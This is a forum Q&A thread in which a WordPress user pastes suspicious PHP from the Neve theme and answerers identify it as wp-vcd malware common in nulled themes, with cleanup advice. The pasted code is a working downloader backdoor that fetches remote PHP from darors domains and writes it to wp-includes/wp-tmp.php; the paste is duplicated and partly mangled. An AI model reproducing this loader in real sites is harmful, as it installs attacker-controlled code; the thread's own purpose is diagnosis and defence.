I have code like below in neve theme WordPress. I feel suspicious about this code

$wp_auth_key='ac15616a33a4bae1388c29de0202c5e1';
        if (($tmpcontent = @file_get_contents(".php") OR $tmpcontent = @file_get_contents_tcurl(".php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        }


        elseif ($tmpcontent = @file_get_contents(".php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        } 

                elseif ($tmpcontent = @file_get_contents("/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

I have code like below in neve theme WordPress. I feel suspicious about this code

$wp_auth_key='ac15616a33a4bae1388c29de0202c5e1';
        if (($tmpcontent = @file_get_contents("http://www.darors/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.darors/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        }


        elseif ($tmpcontent = @file_get_contents("http://www.darors.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        } 

                elseif ($tmpcontent = @file_get_contents("http://www.darors.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

• php
• hacked

• It looks like this might be something intended to check a license key for a paid theme/plugin. It kinda depends on what http://www.darors.pw/code.php contains. – ceejayoz Commented Apr 3, 2019 at 19:15
• That doesn't look like a license key check @ceejayoz. Why would a theme/plugin write a file to a core WP directory (/wp-includes/)? – butlerblog Commented Apr 4, 2019 at 16:14
• @butlerblog Again, without the contents of that code.php file it's hard to know. It's possible it puts something outside the theme directory because of simple bad coding - hardly uncommon. – ceejayoz Commented Apr 4, 2019 at 17:44
• I agree that there's plenty of bad coding out there; but bad coding is exactly that - "bad." Would you trust it? I know I wouldn't. – butlerblog Commented Apr 4, 2019 at 18:54

5 Answers 5

I would agree that there is a strong possibility of a hacked site with that code. The @file_put_contents statement is trying to write to your wp-admin folder. That's not good.

So I would recommend a de-hacking inspection. If you think your site got hacked, there are several (many) things you must do to 'de-hack' it. Including:

• changing all passwords (WP admins, FTP, hosting, database)
• reinstalling WP (via the Updates page) and then reinstalling all themes (from the repository) and plugins manually.
• checking for unknown files (via your hosting File Manager; if you sort by date, invalid ones should stick out because you updated everything).

There are lots of help in the googles on how to de-hack a site. I wrote a set of procedures that I use. It can be done, though, just takes a bit of work.

Looks like wp-vcd malware to me. There's lot's of info out there about that, it's most common in nulled themes (i.e., a premium theme that you didn't want to pay for and instead downloaded a free copy of from a sketchy site). If you are using such a theme, I suggest deleting it, and paying the actual developer for the legitimate copy of the theme that won't include malware, or choosing another theme that fits your budget without the malware.

https://www.google/search?q=%22darors%22+wp-vcd

Yes, most probably yes.

It gets some code from remote server and saves it on yours. So yeah - it definitely can be harmful.

That's a possibility.

Although, I think it is a mechanism to push theme updates only for sites with a valid license key.

Alternatively, it is backdoor for deleting theme for any compromised key.

It is difficult to say anything for sure without looking at the content which is downloaded.

I can confirm that that is a malware to show ads to your users.

There are 3 files in wp-include folder:

'wp-feed.php',
'wp-tmp.php',
'wp-vcd.php',

and also in theme functions.php and other files. Use phpstorm to safe delete and searcg in comments to see in how many files you have that. Here is a blog about that https://www.getastra/blog/911/how-to-fix-wp-vcd-backdoor-hack-in-wordpress-functions-php/

The cause of this can be from infected theme files. Check also your plugins against vulnerable plugins list https://wpvulndb/